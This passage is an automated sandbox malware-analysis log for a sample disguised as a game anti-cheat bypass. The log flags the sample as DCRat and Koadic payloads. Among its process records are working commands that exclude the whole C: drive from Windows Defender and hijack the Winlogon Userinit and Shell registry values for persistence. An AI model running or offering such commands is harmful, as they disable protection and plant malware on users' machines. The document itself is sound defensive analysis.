                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004275EB13_2_004275EB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00437DF013_2_00437DF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00421D8113_2_00421D81
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00439E0013_2_00439E00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042AE1513_2_0042AE15
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040768413_2_00407684
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040768413_2_00407684
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040768413_2_00407684
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040675F13_2_0040675F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00424F6013_2_00424F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041D7DF13_2_0041D7DF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00437FE013_2_00437FE0
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeCode function: 15_2_00007FFD9BAD0F8815_2_00007FFD9BAD0F88
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeCode function: 15_2_00007FFD9BAD366015_2_00007FFD9BAD3660
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeCode function: 15_2_00007FFD9BAD90B415_2_00007FFD9BAD90B4
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeCode function: 15_2_00007FFD9BAE0FF215_2_00007FFD9BAE0FF2
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeCode function: 15_2_00007FFD9BAE0EF215_2_00007FFD9BAE0EF2
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeCode function: 15_2_00007FFD9BCAA32D15_2_00007FFD9BCAA32D
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeCode function: 15_2_00007FFD9BCA06D015_2_00007FFD9BCA06D0
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeCode function: 15_2_00007FFD9BCAAB3915_2_00007FFD9BCAAB39
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeCode function: 15_2_00007FFD9BCA854D15_2_00007FFD9BCA854D
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: String function: 009FF378 appears 72 times
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: String function: 009C7A20 appears 57 times
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: String function: 009FFB08 appears 141 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00409380 appears 43 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00409B10 appears 141 times
                      Source: Bypass.exe.11.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\WINDOWS\system32\userinit.exe, C:\Users\skeet\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe" /f
                      Source: 15.0.Bypass.exe.7f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                      Source: C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypass.bat, type: DROPPEDMatched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
                      Source: C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat, type: DROPPEDMatched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                      Source: 15.2.Bypass.exe.2aa0000.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 15.2.Bypass.exe.2ab0000.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 15.2.Bypass.exe.1b5c0000.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 15.2.Bypass.exe.1bc70000.5.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 15.2.Bypass.exe.2a80000.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@30/247@3/3
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF71611B6D8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF71611B6D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042B218 CoCreateInstance,13_2_0042B218
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF716138624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF716138624
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6888:120:WilError_03
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeMutant created: \Sessions\1\BaseNamedObjects\Local\939f54dd8c64df27b6e4140097f68ee6c8462bf0
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeFile created: C:\Users\user\AppData\Local\Temp\LoaderJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypass.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs"
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCommand line argument: Error12_2_009B6E60
                      Source: bFZYRLnRIz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeFile read: C:\Windows\win.iniJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: i1O30rxsCL.15.dr, 6apLsw2rGZ.15.dr, VCFVhZnHB8.15.dr, TioHhOeuVT.15.dr, FcPQVm4LOX.15.dr, giYLu2T0Hz.15.dr, dpHgQvJE5m.15.dr, yQOuR0mYbY.15.dr, 4VLz2PivYy.15.dr, D3mlX8RR5D.15.dr, ZVz6RyWa8E.15.dr, SZLfDGGRpQ.15.dr, zqauiY1j27.15.dr, ZgTWGrzv0N.15.dr, 8z9mvwlW78.15.dr, HCTotSIKRY.15.dr, MfC0PbcHsT.15.dr, J0iqErTJgv.15.dr, oUnb6ZfQft.15.dr, IPvPagoFUU.15.dr, U9jEY6UgR2.15.dr, sWQIMVhwH5.15.dr, y1i14RBep3.15.dr, AxxuTWpKE6.15.dr, 9LVlx5UGoz.15.dr, QI3FGOH0ky.15.dr, Fj3HlbMqmv.15.dr, XKMcT8qTKg.15.dr, 3TtieY1LVM.15.dr, kEfX6z25uO.15.dr, JwKr72D0r7.15.dr, gSOigylxmi.15.dr, ec2ad5xz0N.15.dr, pMmNPg4nKy.15.dr, UJCjYQibvX.15.dr, sXNE7ovkfM.15.dr, kj1icB2zdT.15.dr, aVagzIlVpJ.15.dr, 6AROTc7Y9L.15.dr, R4l26ImO9h.15.dr, HpyhWocJAP.15.dr, jH7RGar9G8.15.dr, 8AOKsu2UlM.15.dr, LvZDySLdMj.15.dr, Zd0Fj7CNWa.15.dr, f47IstJBJC.15.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: bFZYRLnRIz.exeVirustotal: Detection: 56%
                      Source: bFZYRLnRIz.exeReversingLabs: Detection: 57%
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeFile read: C:\Users\user\Desktop\bFZYRLnRIz.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\bFZYRLnRIz.exe "C:\Users\user\Desktop\bFZYRLnRIz.exe"
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypass.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /c y /n /t 10 /d y
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\WINDOWS\system32\userinit.exe, C:\Users\skeet\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe" /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "C:\WINDOWS\system32\explorer.exe, C:\ProgramData\SoftwareDistribution\572stuOQ0pZG2Xj.exe" /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe C:\Users\user\AppData\Local\Temp\Loader\Loader.exe
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs"
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeProcess created: C:\ProgramData\SoftwareDistribution\Bypass.exe "C:\ProgramData\SoftwareDistribution\Bypass.exe"
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypass.bat" "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.batJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\'Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /c y /n /t 10 /d yJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\WINDOWS\system32\userinit.exe, C:\Users\skeet\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe" /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "C:\WINDOWS\system32\explorer.exe, C:\ProgramData\SoftwareDistribution\572stuOQ0pZG2Xj.exe" /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe C:\Users\user\AppData\Local\Temp\Loader\Loader.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeProcess created: C:\ProgramData\SoftwareDistribution\Bypass.exe "C:\ProgramData\SoftwareDistribution\Bypass.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: dxgidebug.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cacls.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\cacls.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\choice.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: dxgidebug.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: textinputframework.dllJump to behavior
